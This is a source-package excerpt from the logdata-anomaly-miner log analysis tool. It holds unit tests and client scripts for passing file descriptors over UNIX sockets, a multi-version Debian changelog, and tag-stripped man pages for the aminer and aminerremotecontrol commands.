if an exception is thrown, the test fails. # secure_open_file(b'/etc/aminer/conf-enabled/Readme.txt', os.O_RDONLY) # SecureOSFunctions.no_secure_open_warn_once_flag = True # self.assertEqual(error.getvalue(), '') def test2_secure_open_file_relative_path(self): """A file is tried to be opened by using a relative path.""" self.assertRaises(Exception, secure_open_file, 'JsonUtilTest.py', os.O_RDONLY) def test3_secure_open_directory(self): """A directory is tried to be opened without using the O_Directory flag.""" error = sys.stderr = StringIO() directory = b'/etc/' self.assertRaises(Exception, secure_open_file, directory, os.O_RDONLY) secure_open_file(directory, os.O_DIRECTORY) SecureOSFunctions.no_secure_open_warn_once_flag = True self.assertTrue( error.getvalue() in ['WARNING: SECURITY: No secure open yet due to missing openat in python!\n', '']) def test4sendAnnotatedFileDescriptor(self): """A valid annotated file descriptor is to be sent by a socket.""" sock_name = '/tmp/test4unixSocket.sock' # skipcq: BAN-B108 data = b'readmeStream' + b'\x00' + b'You should read these README instructions for better understanding.' # skipcq: BAN-B607, BAN-B603 proc = subprocess.Popen(['python3', 'unit/util/clientTest4.py']) if os.path.exists(sock_name): os.remove(sock_name) # print(self.opening_socket) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] unix_socket_log_data_resource = UnixSocketLogDataResource(b'unix:///tmp/test4unixSocket.sock', connection.fileno()) # print(self.listening) unix_socket_log_data_resource.fill_buffer() self.assertEqual(unix_socket_log_data_resource.buffer, data) # print('Data received: %s' % unix_socket_log_data_resource.buffer) unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer)) self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 80) self.assertEqual(unix_socket_log_data_resource.buffer, b'') # print("Shutting down...") unix_socket_log_data_resource.close() proc.terminate() proc.wait() # print("Done") def test5send_annotated_file_descriptor_invalid_parameters(self): """An invalid access is to be performed by using a closed socket.""" # socket is closed fd = secure_open_file(b'/etc/aminer/conf-enabled/Readme.txt', os.O_RDONLY) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) self.assertRaises(OSError, send_annotated_file_descriptor, client, fd, b'readmeStream', b'You should read these README instructions for better understanding.') def test6send_logstream_descriptor(self): """A valid logstream descriptor is to be sent.""" sock_name = '/tmp/test6unixSocket.sock' # skipcq: BAN-B108 data = b'logstream' + b'\x00' + b'/var/log/syslog' # skipcq: BAN-B607, BAN-B603 subprocess.Popen(['python3', 'unit/util/clientTest6.py']) if os.path.exists(sock_name): os.remove(sock_name) # print(self.opening_socket) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] unix_socket_log_data_resource = UnixSocketLogDataResource(b'unix:///tmp/test6unixSocket.sock', connection.fileno()) # print(self.listening) unix_socket_log_data_resource.fill_buffer() self.assertEqual(unix_socket_log_data_resource.buffer, data) # print('Data received: %s' % unix_socket_log_data_resource.buffer) unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer)) self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 25) self.assertEqual(unix_socket_log_data_resource.buffer, b'') # print("Shutting down...") unix_socket_log_data_resource.close() # print("Done") def test7receive_annotated_file_descriptor(self): """A valid annotated file descriptor is to be received by a socket.""" sock_name = '/tmp/test6unixSocket.sock' # skipcq: BAN-B108 type_info = b'logstream' path = b'/var/log/syslog' data = (type_info, path) # skipcq: BAN-B607, BAN-B603 subprocess.Popen(['python3', 'unit/util/clientTest6.py']) if os.path.exists(sock_name): os.remove(sock_name) # print(self.opening_socket) server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] data_tuple = receive_annoted_file_descriptor(connection) # print(self.listening) self.assertEqual(data_tuple[1], data[0]) self.assertEqual(data_tuple[2], data[1]) # print('Data received: (%i, %s, %s)' % data_tuple) self.assertEqual(len(data_tuple[1]) + len(data_tuple[2]), 24) # print("Done") if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/__init__.py000066400000000000000000000000001437606560100250400ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/clientTest4.py000066400000000000000000000011041437606560100255110ustar00rootroot00000000000000from time import sleep import socket import sys import os sys.path.append('./') sys.path.append('../../') # skipcq: FLK-E402 from aminer.util.SecureOSFunctions import secure_open_file, send_annotated_file_descriptor sock_name = '/tmp/test4unixSocket.sock' # skipcq: BAN-B108 fd = secure_open_file(b'/etc/aminer/conf-enabled/Readme.txt', os.O_RDONLY) sleep(0.5) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client.connect(sock_name) send_annotated_file_descriptor(client, fd, b'readmeStream', b'You should read these README instructions for better understanding.') logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/util/clientTest6.py000066400000000000000000000007411437606560100255210ustar00rootroot00000000000000from time import sleep import socket import sys import os sys.path.append('../../') sys.path.append('./') # skipcq: FLK-E402 from aminer.util.SecureOSFunctions import secure_open_file, send_logstream_descriptor sock_name = '/tmp/test6unixSocket.sock' # skipcq: BAN-B108 fd = secure_open_file(b'/var/log/syslog', os.O_RDONLY) sleep(0.5) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client.connect(sock_name) send_logstream_descriptor(client, fd, b'/var/log/syslog') logdata-anomaly-miner-2.6.1/changelog000066400000000000000000000530661437606560100175750ustar00rootroot00000000000000logdata-anomaly-miner (2.6.1) unstable; urgency=low Changes: * minor refactoring * fixed code styling issues -- Markus Wurzenberger Tue, 21 Feb 2023 12:00:00 +0000 logdata-anomaly-miner (2.6.0) unstable; urgency=low Bugfixes: * fixed bug in JsonModelElement where the aminer gets stuck in an endless loop searching for \x. * added input file path sanitization and fixed exception handling. * fixed a test for the remote control save config method. * fixed bug, that occured when starting one of the detectors VTD, VCD and TSA with an already existing persistency of the ETD, but not of the detectors. * fixed the MissingMatchPathValueDetector by comparing the detector_info[0] instead of the old_last_seen_timestamp. * ParserCount: Fixed timestamp in output * implemented the output_logline parameter in the NewMatchPathValueDetector. * fixed bug where the MissingMatchPathListValueDetector could not be used in yaml, because the ConfigValidator could not load the module. * runHowToEntropyDetector had missing permissions on CFG_PATH in some lines. * fixed bug with closing the streams. Changes: * renamed schemas to python files. * enabled systemd autorestart * improved documentation * added SlidingEventFrequencyDetector * added timestamp_scale parameter to the DateTimeModelElement. * added unique path param for EFD * added check so EXP_TYPE_MANDATORY is enforced. * replace raw data output with last log of event type rather than end of time window * added event count cluster detector * added experimental jsonstringparser * improved parameter consistency * added ScoringEventHandler * EFD: Added the functionality to analze the scoring_path_list with the ScoringEventHandler * ETD/TSA: Moved the initialization part of the TSA from the ETD to the TSA * support for ZeroMQ-Eventhandler * added support for named-pipes -- Markus Wurzenberger Fri, 20 Jan 2023 12:00:00 +0000 logdata-anomaly-miner (2.5.1) unstable; urgency=low Bugfixes: * EFD: Fixed problem that appears with empty windows * Fixed index out of range if matches are empty in JsonModelElement array. * EFD: Fixed problem that appears with empty windows * EFD: Enabled immediate detection without training, if both limits are set * EFD: Fixed bug related to auto_include_flag * Remove spaces in aminer logo * ParserCounter: Fixed do_timer * Fixed code to allow the usage of AtomFilterMatchAction in yaml configs * Fixed JsonModelElement when json object is null * Fix incorrect message of charset detector * Fix match list handling for json objects * Fix incorrect message of charset detector Changes: * Added nullable functionality to JsonModelElements * Added include-directive to supervisord.conf * ETD: Output warning when count first exceeds range * EFD: Added option to output anomaly when the count first exceeds the range * VTD: Added variable type 'range' * EFD: Added the function reset_counter * EFD: Added option to set the lower and upper limit of the range interval * Enhance EFD to consider multiple time windows * VTD: Changed the value of parameter num_updates_until_var_reduction to track all variables from False to 0. * PAD: Used the binom_test of the scipy package as test if the model should be reinitialized if too few anomalies occur than are expected * Add ParsedLogAtom to aminer parser to ensure compatibility with lower versions * Added script to add build-id to the version-string * Support for installations from source in install-script * Fixed and stadardize the persistence time of various detectors * Refactoring * Improve performance * Improve output handling * Improved testing -- Markus Wurzenberger Mon, 09 May 2022 12:00:00 +0000 logdata-anomaly-miner (2.5.0) unstable; urgency=low Bugfixes: * Fixed bug in YamlConfig Changes: * Added supervisord to docker * Moved unparsed atom handlers to analysis(yamlconfig) * Moved new_match_path_detector to analysis(yamlconfig) * Refactor: merged all UnparsedHandlers into one python-file * Added remotecontrol-command for reopening eventhandlers * Added config-parameters for logrotation * Improved testing -- Markus Wurzenberger Fri, 03 Dec 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.2) unstable; urgency=low Bugfixes: * PVTID: Fixed output format of previously appeared times * VTD: Fixed bugs (static -> discrete) * VTD: Fixed persistency-bugs * Fixed %z performance issues * Fixed error where optional keys with an array type are not parsed when being null * Fixed issues with JasonModelElement * Fixed persistence handling for ValueRangeDetector * PTSAD: Fixed a bug, which occurs, when the ETD stops saving the values of one analyzed path * ETD: Fixed the problem when entries of the match_dictionary are not of type MatchElement * Fixed error where json data instead of array was parsed successfully. Changes: * Added multiple parameters to VariableCorrelationDetector * Improved VTD * PVTID: Renamed parameter time_window_length to time_period_length * PVTID: Added check if atom time is None * Enhanced output of MTTD and PVTID * Improved docker-compose-configuration * Improved testing * Enhanced PathArimaDetector * Improved documentation * Improved KernelMsgParsingModel * Added pretty print for json output * Added the PathArimaDetector * TSA: Added functionality to discard arima models with too few log lines per time step * TSA: improved confidence calculation * TSA: Added the option to force the period length * TSA: Automatic selection of the pause area of the ACF * Extended EximGenericParsingModel * Extended AudispdParsingModel -- Markus Wurzenberger Tue, 23 Nov 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.1) unstable; urgency=low Bugfixes: * Fixed issues with array of arrays in JsonParser * Fixed problems with invalid json-output * Fixed ValueError in DTME * Fixed error with parsing floats in scientific notation with the JsonModelElement. * Fixed issue with paths in JsonModelElement * Fixed error with \x encoded json * Fixed error where EMPTY_ARRAY and EMPTY_OBJECT could not be parsed from the yaml config * Fixed a bug in the TSA when encountering a new event type * Fixed systemd script * Fixed encoding errors when reading yaml configs Changes: * Add entropy detector * Add charset detector * Add value range detector * Improved ApacheAccessModel, AudispdParsingModel * Refactoring * Improved documentation * Improved testing * Improved schema for yaml-config * Added EMPTY_STRING option to the JsonModelElement * Implemented check to report unparsed atom if ALLOW_ALL is used with data with a type other than list or dict -- Markus Wurzenberger Fri, 23 Jul 2021 12:00:00 +0000 logdata-anomaly-miner (2.4.0) unstable; urgency=low Bugfixes: * Fixed error in JsonModelElement * Fixed problems with umlauts in JsonParser * Fixed problems with the start element of the ElementValueBranchModelElement * Fixed issues with the stat and debug command line parameters * Fixed issues if posix acl are not supported by the filesystem * Fixed issues with output for non ascii characters * Modified kafka-version Changes: * Improved command-line-options install-script * Added documentation * Improved VTD CM-Test * Improved unit-tests * Refactoring * Added TSAArimaDetector * Improved ParserCount * Added the PathValueTimeIntervalDetector * Implemented offline mode * Added PCA detector * Added timeout-paramter to ESD -- Markus Wurzenberger Fri, 04 Jun 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.1) unstable; urgency=low Bugfixes: * Replaced username and groupname with uid and gid for chown() * Removed hardcoded username and groupname -- Markus Wurzenberger Thu, 08 Apr 2021 12:00:00 +0000 logdata-anomaly-miner (2.3.0) unstable; urgency=low Bugfixes: * Changed pyyaml-version to 5.4 * NewMatchIdValueComboDetector: Fix allow multiple values per id path * ByteStreamLineAtomizer: fixed encoding error * Fixed too many open directory-handles * Added close() function to LogStream Changes: * Added EventFrequencyDetector * Added EventSequenceDetector * Added JsonModelElement * Added tests for Json-Handling * Added command line parameter for update checks * Improved testing * Splitted yaml-schemas into multiple files * Improved support for yaml-config * YamlConfig: set verbose default to true * Various refactoring -- Markus Wurzenberger Mon, 29 Mar 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.1) unstable; urgency=low Bugfixes: * Fixed warnigs due to files in Persistency-Directory * Fixed ACL-problems in dockerfile and autocreate /var/lib/aminer/log Changes: * added simple test for dockercontainer * negate result of the timeout-command. 1 is okay. 0 must be an error * added bullseye-tests * make tmp-dir in debian-bullseye-test and debian-buster-test unique -- Markus Wurzenberger Mon, 25 Jan 2021 12:00:00 +0000 logdata-anomaly-miner (2.2.0) unstable; urgency=low Changes: * Added Dockerfile * Addes checks for acl of persistency directory * Added VariableCorrelationDetector * Added tool for managing multiple persistency files * Added supress-list for output * Added suspend-mode to remote-control * Added requirements.txt * Extended documentation * Extended yaml-configuration-support * Standardize command line parameters * Removed --Forground cli parameter * Fixed Security warnings by removing functions that allow race-condition * Refactoring * Ethical correct naming of variables * Enhanced testing * Added statistic outputs * Enhanced status info output * Changed global learn_mode behavior * Added RemoteControlSocket to yaml-config * Reimplemented the default mailnotificationhandler Bugfixes: * Fixed typos in documentation * Fixed issue with the AtomFilter in the yaml-config * Fixed order of ETD in yaml-config * Fixed various issues in persistency -- Markus Wurzenberger Fri, 18 Dec 2020 17:00:00 +0000 logdata-anomaly-miner (2.1.0) unstable; urgency=low Changes: * Added VariableTypeDetector,EventTypeDetector and EventCorrelationDetector * Added support for unclean format strings in the DateTimeModelElement * Added timezones to the DateTimeModelElement * Enhanced ApacheAccessModel * Yamlconfig: added support for kafka stream * Removed cpu limit configuration * Various refactoring * Yamlconfig: added support for more detectors * Added new command-line-parameters * Renamed executables to aminer.py and aminerremotecontroly.py * Run Aminer in forgroundd-mode per default * Added various unit-tests * Improved yamlconfig and checks * Added start-config for parser to yamlconfig * Renamed config templates * Removed imports from init.py for better modularity * Created AnalysisComponentsPerformanceTests for the EventTypeDetector * Extended demo-config * Renamed whitelist to allowlist * Added warnings for non-existent resources * Changed default of auto_include_flag to false Bugfixes: * Fixed some exit() in forks * Fixed debian files * Fixed JSON output of the AffectedLogAtomValues in all detectors * Fixed normal output of the NewMatchPathValueDetector * Fixed reoccuring alerting in MissingMatchPathValueDetector -- Markus Wurzenberger Thu, 05 Nov 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.2) unstable; urgency=low Changes: * Added help parameters * Added help-screen * Added version parameter * Adden path and value filter * Change time model of ApacheAccessModel for arbitrary time zones * Update link to documentation * Added SECURITY.md * Refactoring * Updated man-page * Added unit-tests for loadYamlconfig Bugfixes: * Fixed header comment type in schema file * Fix debian files -- Markus Wurzenberger Wed, 17 Jul 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.1) unstable; urgency=low Changes: * Updated documentation * Updated testcases * Updated demos * Updated debian files * Added copyright headers * Added executable bit to AMiner -- Markus Wurzenberger Wed, 24 Jun 2020 17:00:00 +0000 logdata-anomaly-miner (2.0.0) bionic; urgency=low Changes: * Updated documentation * Added functions getNameByComponent and getIdByComponent to AnalysisChild.py * Update DefaultMailNotificationEventHandler.py to python3 * Extended AMinerRemoteControl * Added support for configuration in yaml format * Refactoring * Added KafkaEventHandler * Added JsonConverterHandler * Added NewMatchIdValueComboDetector * Enabled multiple default timestamp paths * Added debug feature ParserCount * Added unit and integration tests * Added installer script * Added VerboseUnparsedHandler Bugfixes including: * Fixed dependencies in Debian packaging * Fixed typo in various analysis components * Fixed import of ModelElementInterface in various parsing components * Fixed issues with byte/string comparison * Fixed issue in DecimalIntegerValueModelElement, when parsing integer including sign and padding character * Fixed unnecessary long blocking time in SimpleMultisourceAtomSync * Changed minum matchLen in DelimitedDataModelElement to 1 byte * Fixed timezone offset in ModuloTimeMatchRule * Minor bugfixes -- Markus Wurzenberger Fri, 29 May 2020 17:00:00 +0000 logdata-anomaly-miner (1.0.0) bionic; urgency=low Changes: * Ported code to Python 3 * Code cleanup using pylint * Added util/JsonUtil.py to encode byte strings for storing them as json objects * Added docs/development-procedures.txt which documents development procedures Features: * New MissingMatchPathListValueDetector to detect stream interuption * Added parsing support for kernel IP layer martian package messages * Systemd parsing of apt invocation messages. Bugfixes: * AnalysisChild: handle remote control client connection errors correctly * Various bugfixes -- Markus Wurzenberger Tue, 2 Oct 2018 17:00:00 +0000 logdata-anomaly-miner (0.0.8) xenial; urgency=low Apart from bugfixes, new parsing and analysis components were added: * Base64StringModelElement * DecimalFloatValueModelElement * StringRegexMatchRule * EnhancedNewMatchPathValueComboDetector -- Roman Fiedler Tue, 30 May 2017 17:00:00 +0000 logdata-anomaly-miner (0.0.7) xenial; urgency=low The datetime parsing DateTimeModelElement was reimplemented to fix various shortcomings of strptime in Python and libc. This will require changes in configuration due to API changes, e.g.: -time_model=DateTimeModelElement('time', '%b %d %H:%M:%S', 15, False) +time_model=DateTimeModelElement('time', '%b %d %H:%M:%S') See /usr/lib/logdata-anomaly-miner/aminer/parsing/DateTimeModelElement.py source code documentation for currently supported datetime format options. The code for reading log input was improved to allow also input from UNIX sockets. Thus the configuration was changed to support those modes: -config_properties['LogFileList']=['/var/log/auth.log', ... +config_properties['LogResourceList'] = ['file:///var/log/auth.log', ... -- Roman Fiedler Mon, 9 Jan 2017 18:00:00 +0000 logdata-anomaly-miner (0.0.6) xenial; urgency=low The input IO-handling was redesigned, thus introducing following API changes. The changes are flaged with (D)eveloper and (U)ser to indicate if only developers of own AMiner addons are affected or also users may need to migrate their configuration. * Upper layers receive LogAtom objects instead of log lines, parsing data as separate parameters. Thus also separate paths for forwarding of parsed and unparsed atoms are not required any more. See below for details (D, U): * Update any own UnparsedAtomHandler/ParsedAtomHandlerInterface implementations to use new interface "input.AtomHandlerInterface" and access to additional information to new methods and fields (D): -from aminer.parsing import ParsedAtomHandlerInterface +from aminer.input import AtomHandlerInterface -class YourHandler(ParsedAtomHandlerInterface, ... +class YourHandler(AtomHandlerInterface, - def receiveParsedAtom(self, atom_data, parser_match): + def receive_atom(self, log_atom): - timestamp=parser_match.get_default_timestamp() + timestamp=log_atom.get_timestamp() + parser_match=log_atom.parser_match - print '%s' % atom_data + print '%s' % log_atom.rawData * With parsed/unparsed atom processing path convergence, naming of other classes does not make sense any more (U): -from aminer.analysis import VolatileLogarithmicBackoffParsedAtomHistory +from aminer.util import VolatileLogarithmicBackoffAtomHistory - from aminer.analysis import ParsedAtomFilters + from aminer.analysis import AtomFilters - match_action=Rules.ParsedAtomFilterMatchAction(... + match_action=Rules.AtomFilterMatchAction(... - parsed_atom_handlers=[] - unparsed_atom_handlers=[] - analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( - parsing_model, parsed_atom_handlers, unparsed_atom_handlers, ... + atom_filter=AtomFilters.SubhandlerFilter(None) + analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( + parsing_model, [atom_filter], ... For handling of unparsed atoms: - unparsed_atom_handlers.append(SimpleUnparsedAtomHandler(anomaly_event_handlers)) + atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), + stop_when_handled_flag=True) For handling of parsed atoms: - parsed_atom_handlers.append(... + atom_filter.add_handler(... -- Roman Fiedler Fri, 4 Nov 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.5) xenial; urgency=low Following API changes were introduced: * Lower input layers dealing with binary data stream reading, splitting into atoms and forwarding data to the parsing model were redesigned. Following configuration changes are required to adapt "config.py" and probably "analysis.py" to the new API: * analysis_context.register_component(): register_as_raw_atom_handler parameter not needed any more, can be removed. * SimpleParsingModelRawAtomHandler is not needed any more, that part can be replaced by configuration: # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory=SimpleByteStreamLineAtomizerFactory( parsing_model, parsed_atom_handlers, unparsed_atom_handlers, anomaly_event_handlers, default_timestamp_paths=['/model/syslog/time']) * SimpleUnparsedAtomHandler was moved from "aminer.events" to "aminer.input". -- Roman Fiedler Mon, 11 Oct 2016 18:00:00 +0000 logdata-anomaly-miner (0.0.4) xenial; urgency=low Following API changes were introduced: * Event handling (general): Change of EventHandlerInterface to include also event_source as last parameter. See /usr/lib/logdata-anomaly-miner/aminer/events/__init__.py * VolatileLogarithmicBackoffEventHistory: Added event ID and source to stored tuple to allow unique identification of events. Split result of "getHistory()" to include "eventId, eventType, event_message, sorted_log_lines, event_data, event_source". -- Roman Fiedler Fri, 26 Aug 2016 15:15:00 +0000 logdata-anomaly-miner (0.0.3) xenial; urgency=low Following API changes were introduced: * To improve readability of configuration files, main parser, analysis and event classes were added to the submodule namespaces. After imports directly from the submodule, e.g. "from aminer.parsing import FixedDataModelElement", the name duplication "FixedDataModelElement.FixedDataModelElement" is not required any more, "FixedDataModelElement" is sufficient. Use "sed -i -e 's/Name.Name/Name/g' [files]" to adapt. * Component timing was restructured to allow forensic/realtime triggering. Therefore also clean interface was added, which is now also used to reduce redundant code in component registration. Old way: analysis_context.register_component(new_match_path_detector, component_name=None, register_as_raw_atom_handler=False, register_as_time_triggered_handler=True) New way: analysis_context.register_component(new_match_path_detector, register_as_raw_atom_handler=False) For own custom time-triggered components, make sure to implement the "aminer.util.TimeTriggeredComponentInterface". Use any standard component, e.g. "/usr/lib/logdata-anomaly-miner/aminer/analysis/NewMatchPathDetector.py" as example. * Introduction of "AnalysisContext" to have common handle for all data required to perform the analysis. Therefore also the signature of "build_analysis_pipeline" in "config.py/analysis.py" has changed from def build_analysis_pipeline(aminer_config): to def build_analysis_pipeline(analysis_context): Old references to "aminer_config" within the configuration script have to be replaced by "analysis_context.aminer_config". -- Roman Fiedler Thu, 21 Jul 2016 19:00:00 +0000 logdata-anomaly-miner-2.6.1/debian/000077500000000000000000000000001437606560100171335ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/debian/aminer.1.xml000066400000000000000000000230151437606560100212700ustar00rootroot00000000000000 .

will be generated. You may view the manual page with: nroff -man .
| less'. A typical entry in a Makefile or Makefile.am is: DB2MAN = /usr/share/sgml/docbook/stylesheet/xsl/docbook-xsl/manpages/docbook.xsl XP = xsltproc -''-nonet -''-param man.charmap.use.subset "0" manpage.1: manpage.xml $(XP) $(DB2MAN) $< The xsltproc binary is found in the xsltproc package. The XSL files are in docbook-xsl. A description of the parameters you can use can be found in the docbook-xsl-doc-* packages. Please remember that if you create the nroff version in one of the debian/rules file targets (such as build), you will need to include xsltproc and docbook-xsl in your Build-Depends control field. Alternatively use the xmlto command/package. That will also automatically pull in xsltproc and docbook-xsl. Notes for using docbook2x: docbook2x-man does not automatically create the AUTHOR(S) and COPYRIGHT sections. In this case, please add them manually as ... . To disable the automatic creation of the AUTHOR(S) and COPYRIGHT sections read /usr/share/doc/docbook-xsl/doc/manpages/authors.html. This file can be found in the docbook-xsl-doc-html package. Validation can be done using: `xmllint -''-noout -''-valid manpage.xml` General documentation about man-pages and man-page-formatting: man(1), man(7), http://www.tldp.org/HOWTO/Man-Page/ --> ]> &dhtitle; &dhpackage; &dhfirstname; &dhsurname; Wrote this manpage for the Debian system.
&dhemail;
2016 &dhusername; This manual page was written for the Debian system (and may be used by others). Permission is granted to copy, distribute and/or modify this document under the terms of the GNU General Public License, Version 3. On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL. AMINER &dhsection; aminer lightweight tool for log checking, log analysis aminer DESCRIPTION This manual page documents briefly the aminer command. For more details see packaged documentation at /usr/share/doc/logdata-anomaly-miner. OPTIONS Specify the configuration file, otherwise /etc/aminer/config.py is used. See /etc/aminer/template_config.py or /etc/aminer/template_config.yml for configuration file templates and examples. With this parameter, aminer will detach from the terminal and daemonize. When not in foreground mode, aminer will also change the working directory to /, hence relative path in configuration file will not work. Set the statistic logging level. Possible stat-levels are 0 for no statistics, 1 (default) for normal statistic level and 2 for verbose statistics. Set the debug logging level. Possible debug-levels are 0 for no debugging, 1 (default) for normal output (INFO and above), 2 for printing all debug information. INTERNAL PARAMETER - DO NOT USE. It is just documented here for completeness. Restores the persistence directory from backup-directory. With this parameter all persisted data in config_properties['Core.PersistenceDir'] is deleted. USE THIS PARAMETER CAREFULLY. IT DELETES ALL SUB-DIRECTORIES OF THE PERSISTENCE DIRECTORY. Remove persisted data of one Detector. --remove NewMatchPathDetector --remove NewMatchPathDetector --remove EventCorrelationDetector With this parameter all live data in config_properties['Core.PersistenceDir']/AnalysisChild/RepositioningData is deleted. Prints the help-screen Prints the version-string FILES /etc/aminer/config.py The main configuration file for the aminer daemon. See /etc/aminer/template_config.py and /etc/aminer/template_config.yml for configuration file templates and examples. BUGS Report bugs via your distribution's bug tracking system. For bugs in the the software trunk, report via at . At startup, aminer will quite likely print out some security warnings to increase transparency. They are here just to remind you of the limitations the current implementation. They should be the same as for nearly all other programs on your platform, just that others do not tell you. See the source code documentation for a short explanation, why a given part of the implementation is not that secure as it could be when leveraging the security features a platform could provide you. SEE ALSO aminerremotecontrol1 logdata-anomaly-miner-2.6.1/debian/aminerremotecontrol.1.xml000077500000000000000000001044371437606560100241200ustar00rootroot00000000000000 .
will be generated. You may view the manual page with: nroff -man .
| less'. A typical entry in a Makefile or Makefile.am is: DB2MAN = /usr/share/sgml/docbook/stylesheet/xsl/docbook-xsl/manpages/docbook.xsl XP = xsltproc -''-nonet -''-param man.charmap.use.subset "0" manpage.1: manpage.xml $(XP) $(DB2MAN) $< The xsltproc binary is found in the xsltproc package. The XSL files are in docbook-xsl. A description of the parameters you can use can be found in the docbook-xsl-doc-* packages. Please remember that if you create the nroff version in one of the debian/rules file targets (such as build), you will need to include xsltproc and docbook-xsl in your Build-Depends control field. Alternatively use the xmlto command/package. That will also automatically pull in xsltproc and docbook-xsl. Notes for using docbook2x: docbook2x-man does not automatically create the AUTHOR(S) and COPYRIGHT sections. In this case, please add them manually as ... . To disable the automatic creation of the AUTHOR(S) and COPYRIGHT sections read /usr/share/doc/docbook-xsl/doc/manpages/authors.html. This file can be found in the docbook-xsl-doc-html package. Validation can be done using: `xmllint -''-noout -''-valid manpage.xml` General documentation about man-pages and man-page-formatting: man(1), man(7), http://www.tldp.org/HOWTO/Man-Page/ --> ]> &dhtitle; &dhpackage; &dhfirstname; &dhsurname; Wrote this manpage for the Debian system.
&dhemail;
2016 &dhusername; This manual page was written for the Debian system (and may be used by others). Permission is granted to copy, distribute and/or modify this document under the terms of the GNU General Public License, Version 3. On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL. AMINERREMOTECONTROL &dhsection; aminerremotecontrol lightweight tool for log checking, log analysis aminerremotecontrol command file DESCRIPTION This manual page documents briefly the aminerremotecontrol command. The command executes arbitrary remote control commands in a running aminer child process. As child process is usually running with lowered privileges or SELinux/AppArmor confinement, you may observe unexpected results when accessing resources outside the child process, e.g. files. For more details see also packaged documentation at /usr/share/doc/logdata-anomaly-miner. Example usecases: /usr/bin/aminerremotecontrol --data '["LogResourceList"]' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' /usr/bin/aminerremotecontrol --exec 'print_current_config(analysis_context)' /usr/bin/aminerremotecontrol --data '["Resources.MaxMemoryUsage", -1]' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' --exec 'change_config_property(analysis_context, "%s" % remote_control_data[0], remote_control_data[1])' --exec ' print_config_property(analysis_context, "%s" % remote_control_data[0])' OPTIONS with long options starting with two dashes ('-'). A summary of options is included below. For a complete description, see the info 1 files. socket Specify the Unix domain remote control socket path, otherwise /var/run/aminer-remote.socket is used. The socket is opened by aminer when 'RemoteControlSocket' feature is enabled in configuration. As the socket is of SOCK_STREAM type, it may also be forwarded via any other stream forwarders, e.g. socat (see UNIX-CONNECT and UNIX-LISTEN) and SSH (see LocalForward, DynamicForward). Access control is only done by file system permissions (DAC) of the socket, so make sure not to widen the access on error. command For each --exec option, the next argument is sent in a separate remote execution request using additional execution data (see --data). The command is executed in a separate execution namespace with only some variables added to the local namespace, e.g. execution data is available as 'remote_control_data'. When setting the local variable 'remoteControlResponse' within the executed command, the object is serialized using json and sent back in the response. file For each --exec-file option, the named file is loaded and content submitted in the very same way as if --exec parameter with content as string would have been used. data This parameter defines a json string defining Python objects, that will be sent with all subsequent --exec operations until changed again using another --data option. Take into account, that there are size limits for the request, very large data objects may exceed those limits. The execution context will expose the data as variable 'remote_control_data'. When set, aminerremotecontrol will not pass the result to repr. The returned object is just converted to a plain string via str(object) and the result is printed to avoid escaping of quotation marks, newlines, .... WARNING: This might be insecure: without escaping the printed data may contain terminal control sequences to exploit vulnerabilities or misconfiguration of your terminal to execute code with privileges of terminal or the process calling aminerremotecontrol (usually root). Commands This method allows you to change properties from the AminerConfig at runtime. For every property to be changed this method must be used. The method prints "property_name changed to value successfully." if the changes were successful and an individual message if the changes failed. Read more about which properties can be changed in the section. This method allows you to change attributes from components of the AminerConfig at runtime. For every attribute to be changed this method must be used. The method prints "component_name.attribute changed to value successfully. " if the changes were successful and an individual message if the changes failed. The type of the new value must be the same like the old value of the component_name.attribute example: aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPath','learn_mode', False)" Renames the component from the old_component_name to new_component_name. Therefore the component with the old_component_name is deleted from the registered components and registered with the new_component_name. example: aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPath','NewMatchPathDetector')" Adds the component to the atom_filter and registers it with the component_name. example: aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context,'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True),'NewMatchPathDet')" Prints the property with the property_name from the current AminerConfig. example: aminerremotecontrol --exec "print_config_property(analysis_context,'LogResourceList')" Prints the attribute of the component with the component_name. example: aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context,'NewMatchPath','learn_mode')" Prints the current AminerConfig. It is strongly recommended to use the parameter for better readability. example: aminerremotecontrol --exec "print_current_config(analysis_context)" --string-response Saves the current AminerConfig into destination_file. destination_file must have write permissions by the aminerremotecontrol process or it returns an . example: aminerremotecontrol --exec "save_current_config(analysis_context,'/tmp/config.py')" Saves all persistence data by calling 